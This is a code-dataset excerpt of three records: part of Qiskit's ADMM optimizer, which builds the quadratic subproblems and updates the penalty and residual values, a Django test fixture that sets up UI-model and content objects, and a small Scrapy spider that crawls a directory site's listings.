self._state.op.variables.get_upper_bounds(self._state.continuous_indices)\n if continuous_size:\n # add u variables.\n op2.variables.add(names=[\"u0_\" + str(i + 1) for i in range(continuous_size)],\n types=[\"C\"] * continuous_size, lb=lower_bounds, ub=upper_bounds)\n\n # add z variables.\n op2.variables.add(names=[\"z0_\" + str(i + 1) for i in range(binary_size)],\n types=[\"C\"] * binary_size,\n lb=[0.] * binary_size,\n ub=[1.] * binary_size)\n\n # set quadratic objective coefficients for u variables.\n if continuous_size:\n # NOTE: The multiplication by 2 is needed for the solvers to parse\n # the quadratic coefficients.\n q_u = 2 * self._state.q1\n for i in range(continuous_size):\n for j in range(i, continuous_size):\n op2.objective.set_quadratic_coefficients(i, j, q_u[i, j])\n\n # set quadratic objective coefficients for z variables.\n # NOTE: The multiplication by 2 is needed for the solvers to parse\n # the quadratic coefficients.\n q_z = 2 * (self._state.rho / 2 * np.eye(binary_size))\n for i in range(binary_size):\n for j in range(i, binary_size):\n op2.objective.set_quadratic_coefficients(i + continuous_size, j + continuous_size,\n q_z[i, j])\n\n # set linear objective for u variables.\n if continuous_size:\n linear_u = self._state.c1\n for i in range(continuous_size):\n op2.objective.set_linear(i, linear_u[i])\n\n # set linear objective for z variables.\n linear_z = -1 * self._state.lambda_mult - self._state.rho * (self._state.x0 + self._state.y)\n for i in range(binary_size):\n op2.objective.set_linear(i + continuous_size, linear_z[i])\n\n # constraints for z.\n # A1 z <= b1.\n constraint_count = self._state.a1.shape[0]\n # in SparsePair val=\"something from numpy\" causes an exception\n # when saving a model via cplex method.\n # rhs=\"something from numpy\" is ok.\n # so, we convert every single value to python float\n lin_expr = [SparsePair(ind=list(range(continuous_size, continuous_size + binary_size)),\n val=self._state.a1[i, :].tolist()) for i in\n range(constraint_count)]\n op2.linear_constraints.add(lin_expr=lin_expr, senses=[\"L\"] * constraint_count,\n rhs=list(self._state.b1))\n\n if continuous_size:\n # A2 z + A3 u <= b2\n constraint_count = self._state.a2.shape[0]\n lin_expr = [SparsePair(ind=list(range(continuous_size + binary_size)),\n val=self._state.a3[i, :].tolist() +\n self._state.a2[i, 
:].tolist())\n for i in range(constraint_count)]\n op2.linear_constraints.add(lin_expr=lin_expr,\n senses=[\"L\"] * constraint_count,\n rhs=self._state.b2.tolist())\n\n if continuous_size:\n # A4 u <= b3\n constraint_count = self._state.a4.shape[0]\n lin_expr = [SparsePair(ind=list(range(continuous_size)),\n val=self._state.a4[i, :].tolist()) for i in\n range(constraint_count)]\n op2.linear_constraints.add(lin_expr=lin_expr,\n senses=[\"L\"] * constraint_count,\n rhs=self._state.b3.tolist())\n\n return op2\n\n def _create_step3_problem(self) -> OptimizationProblem:\n \"\"\"Creates a step 3 sub-problem.\n\n Returns:\n A newly created optimization problem.\n \"\"\"\n op3 = OptimizationProblem()\n # add y variables.\n binary_size = len(self._state.binary_indices)\n op3.variables.add(names=[\"y_\" + str(i + 1) for i in range(binary_size)],\n types=[\"C\"] * binary_size)\n\n # set quadratic objective.\n # NOTE: The multiplication by 2 is needed for the solvers to parse the quadratic coeff-s.\n q_y = 2 * (self._params.beta / 2 * np.eye(binary_size) +\n self._state.rho / 2 * np.eye(binary_size))\n for i in range(binary_size):\n for j in range(i, binary_size):\n op3.objective.set_quadratic_coefficients(i, j, q_y[i, j])\n\n linear_y = self._state.lambda_mult + self._state.rho * (self._state.x0 - self._state.z)\n for i in range(binary_size):\n op3.objective.set_linear(i, linear_y[i])\n\n return op3\n\n def _update_x0(self, op1: OptimizationProblem) -> np.ndarray:\n \"\"\"Solves the Step1 OptimizationProblem via the qubo optimizer.\n\n Args:\n op1: the Step1 OptimizationProblem.\n\n Returns:\n A solution of the Step1, as a numpy array.\n \"\"\"\n return np.asarray(self._qubo_optimizer.solve(op1).x)\n\n def _update_x1(self, op2: OptimizationProblem) -> (np.ndarray, np.ndarray):\n \"\"\"Solves the Step2 OptimizationProblem via the continuous optimizer.\n\n Args:\n op2: the Step2 OptimizationProblem\n\n Returns:\n A solution of the Step2, as a pair of numpy arrays.\n First array contains the values of decision variables u, and\n second array contains the values of decision variables z.\n\n \"\"\"\n vars_op2 = self._continuous_optimizer.solve(op2).x\n vars_u = np.asarray(vars_op2[:len(self._state.continuous_indices)])\n vars_z = np.asarray(vars_op2[len(self._state.continuous_indices):])\n return vars_u, vars_z\n\n def _update_y(self, op3: OptimizationProblem) -> np.ndarray:\n \"\"\"Solves the Step3 OptimizationProblem via the continuous optimizer.\n\n Args:\n op3: the Step3 OptimizationProblem\n\n Returns:\n A solution of the Step3, as a numpy array.\n\n \"\"\"\n return np.asarray(self._continuous_optimizer.solve(op3).x)\n\n def _get_best_merit_solution(self) -> (List[np.ndarray], float):\n \"\"\"The ADMM solution is that for which the merit value is the best (least for min problems,\n greatest for max problems)\n * sol: Iterate with the best merit value\n * sol_val: Value of sol, according to the original objective\n\n Returns:\n A tuple of (sol, sol_val), where\n * sol: Solution with the best merit value\n * sol_val: Value of the objective function\n \"\"\"\n\n # pylint:disable=invalid-name\n it_best_merits = self._state.merits.index(\n self._state.sense * min(list(map(lambda x: self._state.sense * x, self._state.merits))))\n x0 = self._state.x0_saved[it_best_merits]\n u = self._state.u_saved[it_best_merits]\n sol = [x0, u]\n sol_val = self._state.cost_iterates[it_best_merits]\n return sol, sol_val\n\n def _update_lambda_mult(self) -> np.ndarray:\n \"\"\"\n Updates the values of lambda multiplier, 
given the updated iterates\n x0, z, and y.\n\n Returns: The updated array of values of lambda multiplier.\n\n \"\"\"\n return self._state.lambda_mult + \\\n self._state.rho * (self._state.x0 - self._state.z + self._state.y)\n\n def _update_rho(self, primal_residual: float, dual_residual: float) -> None:\n \"\"\"Updating the rho parameter in ADMM.\n\n Args:\n primal_residual: primal residual\n dual_residual: dual residual\n \"\"\"\n\n if self._params.vary_rho == UPDATE_RHO_BY_TEN_PERCENT:\n # Increase rho, to aid convergence.\n if self._state.rho < 1.e+10:\n self._state.rho *= 1.1\n elif self._params.vary_rho == UPDATE_RHO_BY_RESIDUALS:\n if primal_residual > self._params.mu_res * dual_residual:\n self._state.rho = self._params.tau_incr * self._state.rho\n elif dual_residual > self._params.mu_res * primal_residual:\n self._state.rho = self._params.tau_decr * self._state.rho\n\n def _get_constraint_residual(self) -> float:\n \"\"\"Compute violation of the constraints of the original problem, as:\n * norm 1 of the body-rhs of the constraints A0 x0 - b0\n * -1 * min(body - rhs, 0) for geq constraints\n * max(body - rhs, 0) for leq constraints\n\n Returns:\n Violation of the constraints as a float value\n \"\"\"\n\n cr0 = sum(np.abs(np.dot(self._state.a0, self._state.x0) - self._state.b0))\n\n eq1 = np.dot(self._state.a1, self._state.x0) - self._state.b1\n cr1 = sum(max(val, 0) for val in eq1)\n\n eq2 = np.dot(self._state.a2, self._state.x0) + np.dot(self._state.a3,\n self._state.u) - self._state.b2\n cr2 = sum(max(val, 0) for val in eq2)\n\n return cr0 + cr1 + cr2\n\n def _get_merit(self, cost_iterate: float, constraint_residual: float) -> float:\n \"\"\"Compute merit value associated with the current iterate\n\n Args:\n cost_iterate: Cost at the certain iteration.\n constraint_residual: Value of violation of the constraints.\n\n Returns:\n Merit value as a float\n \"\"\"\n return cost_iterate + self._params.mu_merit * constraint_residual\n\n def _get_objective_value(self) -> float:\n \"\"\"Computes the value of the objective function.\n\n Returns:\n Value of the objective function as a float\n \"\"\"\n\n def quadratic_form(matrix, x, c):\n return np.dot(x.T, np.dot(matrix / 2, x)) + np.dot(c.T, x)\n\n obj_val = quadratic_form(self._state.q0, self._state.x0, self._state.c0)\n obj_val += quadratic_form(self._state.q1, self._state.u, self._state.c1)\n \n obj_val += self._state.op.objective.get_offset()\n\n return obj_val\n\n def _get_solution_residuals(self, iteration: int) -> (float, float):\n \"\"\"Compute primal and dual residual.\n\n Args:\n iteration: Iteration number.\n\n Returns:\n r, s as primary and dual residuals.\n \"\"\"\n elements = self._state.x0 - self._state.z - self._state.y\n primal_residual = np.linalg.norm(elements)\n if iteration > 0:\n elements_dual = self._state.z - self._state.z_saved[iteration - 1]\n else:\n elements_dual = self._state.z - self._state.z_init\n dual_residual = self._state.rho * np.linalg.norm(elements_dual)\n\n return primal_residual, dual_residual\n","sub_path":"qiskit/optimization/algorithms/admm_optimizer.py","file_name":"admm_optimizer.py","file_ext":"py","file_size_in_byte":37132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
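`_update_rho` above implements two policies: a flat 10% growth per iteration and a residual-balancing rule. For reference, here is a standalone sketch of the textbook residual-balancing update from Boyd et al. (2011, §3.4.1) that `UPDATE_RHO_BY_RESIDUALS` references; note that the textbook shrink step divides by `tau_decr`, while the class above multiplies, so treat this as the standard variant rather than a copy of the implementation:

```python
# Residual-balancing rho update (Boyd et al., 2011). Defaults mirror
# ADMMParameters: mu_res=10, tau_incr=2, tau_decr=2.
def update_rho(rho, primal_res, dual_res, mu_res=10.0,
               tau_incr=2.0, tau_decr=2.0):
    if primal_res > mu_res * dual_res:
        return tau_incr * rho   # primal residual dominates: increase rho
    if dual_res > mu_res * primal_res:
        return rho / tau_decr   # dual residual dominates: decrease rho
    return rho                  # residuals balanced: leave rho unchanged

print(update_rho(1000.0, primal_res=50.0, dual_res=1.0))  # 2000.0
print(update_rho(1000.0, primal_res=1.0, dual_res=50.0))  # 500.0
print(update_rho(1000.0, primal_res=5.0, dual_res=4.0))   # 1000.0
```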
+{"seq_id":"611401762","text":"from StringIO import StringIO\n\nfrom django.core.files import File as DjangoFile\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase\n\nfrom .uimodel.models import UIModel, ViewMap, Page, PageLayout, \\\n Device, UIModelDevice\nfrom .baseclib.models import Draft, Edit, Edition, CItemPath, CItem, ImportItem\nfrom .uiprofile.models import UIProfile, PageState, ContentForBox\nfrom .layout.models import Layout, LayoutLayer, LayerBox\n \n\nclass MCMSTestCase(TestCase):\n def setUp(self):\n self.user = User.objects.create_user(username='default')\n #we need a uimodel\n self.uimodel = UIModel.objects.create(name='curriculum1',\n version ='1')\n self.unitset_view_model = ViewMap.objects.create(\n uimodel=self.uimodel,\n name='unitset',\n parent=None)\n self.unit_view_model = ViewMap.objects.create(\n uimodel=self.uimodel,\n name='unit',\n parent=self.unitset_view_model)\n self.lesson_view_model = ViewMap.objects.create(\n uimodel=self.uimodel,\n name='lesson',\n parent=self.unit_view_model)\n self.slide_viewstate_model = Page.objects.create(\n uimodel=self.uimodel,\n viewmap=self.lesson_view_model,\n name='slide')\n self.device = Device.objects.create(name='device1')\n self.uimodeldevice = UIModelDevice.objects.create(\n uimodel=self.uimodel,\n device=self.device)\n #create a layout\n self.layout1 = Layout.objects.create(name='layout1')\n self.layout1_layer1 = LayoutLayer.objects.create(\n name='layout1_layer1',\n layout=self.layout1)\n self.layerbox1 = LayerBox.objects.create(\n name='layout1_box1',\n ordinal=0,\n layer=self.layout1_layer1)\n self.layerbox2 = LayerBox.objects.create(\n name='layout1_box2',\n ordinal=1,\n layer=self.layout1_layer1)\n #hook the layout up to our uimodel\n self.viewstatelayout1 = PageLayout.objects.create(\n page=self.slide_viewstate_model,\n device=self.uimodeldevice,\n layout=self.layout1)\n #add a content collection (draft and edition)\n self.draft = Draft.objects.create_draft('draft1', self.user)\n content_specs = [\n {\n 'fname': 'foo.html',\n 'description': 'some html',\n 'path': '/content/html',\n 'content': 'foo',\n },\n {\n 'fname': 'bar.html',\n 'description': 'some more html',\n 'path': '/content/html',\n 'content': 'bar',\n },\n ]\n edit = Edit.objects.create(user=self.user, source='upload',\n draft=self.draft)\n for spec in content_specs:\n file_like = StringIO(spec['content'])\n file_like.name = spec['fname']\n file_like.size = len(spec['content'])\n imported = ImportItem.objects.create(\n name=spec['fname'],\n description=spec['description'],\n requested_path=spec['path'],\n contentfile=DjangoFile(file_like, name=spec['fname']),\n edit=edit)\n imported.detect_type()\n item = CItem.objects.install_imported(self.user, imported)\n spec['item'] = item\n \n self.edition = self.draft.make_edition('edition1')\n #create a profile\n self.uiprofile = UIProfile.objects.create(uimodel=self.uimodel,\n edition=self.edition,\n is_frozen=False)\n self.carton1 = PageState.objects.create(\n uiprofile=self.uiprofile,\n page_layout=self.viewstatelayout1)\n self.contentforbox1 = ContentForBox.objects.create(\n box=self.layerbox1,\n citem=content_specs[0]['item'],\n page_state=self.carton1)\n","sub_path":"mcms/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"653564104","text":"from scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n#sccrapy规则爬虫\nfrom example.items import ExampleItem\n\n\nclass DmozSpider(CrawlSpider):\n \"\"\"Follow categories and extract links.\"\"\"\n name = 'chinadmoz'\n allowed_domains = ['chinadmoz.org']\n start_urls = ['http://www.chinadmoz.org/']\n\n rules = [\n Rule(LinkExtractor(allow=r\"/subindustry/\\d+/\"), callback='parse_directory', follow=True),\n ]\n\n def parse_directory(self, response):\n\n node_all = response.xpath('//ul[@class=\"boxbdnopd\"]/li')\n\n for node in node_all:\n item = ExampleItem()\n name = node.xpath('.//h4/a/text()').extract()[0]\n\n link = node.xpath('.//h4/a/@href').extract()[0]\n\n description = node.xpath('.//p[@class=\"description\"]/text()').extract()[0]\n\n item[\"name\"] = name\n item[\"link\"] = link\n item[\"description\"] = description\n\n print(\"link==\",link)\n yield item\n\n\n # for div in response.css('.title-and-desc'):\n # yield {\n # 'name': div.css('.site-title::text').extract_first(),\n # 'description': div.css('.site-descr::text').extract_first().strip(),\n # 'link': div.css('a::attr(href)').extract_first(),\n # }\n","sub_path":"day11/teacher/scrapy-redis/example-project/example/spiders/dmoz.py","file_name":"dmoz.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}